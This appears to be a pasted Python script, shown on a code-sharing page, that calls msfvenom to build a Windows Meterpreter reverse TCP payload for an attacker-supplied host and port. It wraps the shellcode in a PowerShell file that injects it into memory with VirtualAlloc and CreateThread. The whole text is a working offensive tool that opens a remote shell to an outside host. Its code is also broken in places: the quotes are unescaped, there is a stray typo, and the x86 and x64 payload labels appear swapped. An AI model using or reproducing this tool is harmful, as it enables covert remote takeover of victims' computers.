Untitled
unknown
plain_text
4 years ago
2.2 kB
6
Indexable
#!/usr/bin/env python3
import subprocess
import fire
class PS_meminject(object):
def __create_script(self, code):
f = open("met.ps1", "w+")
script = ""
script += "$code = '\n"
script += "[DllImport("kernel32.dll")]\n"
script += "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\n"
script += "[DllImport("kernel32.dll")]\n"
script += "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\n"
script += "[DllImport(i"msvcrt.dll")]\n"
script += "public static extern IntPtr memset(IntPtr dest, uint src, uint count);';\n\n"
script += "$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;\n"
script += "[Byte[]];\n"
script += "[Byte[]] $sc ="
script += str(code)
script += "$size = 0x1000;\n"
script += "if ($sc.Length -gt 0x1000) {$size = $sc.Length};\n"
script += "$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);\n"
script += "for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i),$sc[$i], 1)};\n"
script += "$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };\n"
f.write(script)
f.close()
def met64(self, LHOST, LPORT):
code = subprocess.check_output(
"msfvenom -p windows/meterpreter/reverse_tcp LHOST="
+ str(LHOST)
+ " LPORT="
+ str(LPORT)
+ " -f powershell EXITFUNC=thread ",
shell=True,
)
self.__create_script(code)
def met(self, LHOST, LPORT):
code = subprocess.check_output(
"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="
+ str(LHOST)
+ " LPORT="
+ str(LPORT)
+ " -f powershell EXITFUNC=thread ",
shell=True,
)
self.__create_script(code)
if __name__ == "__main__":
fire.Fire(PS_meminject)
Editor is loading...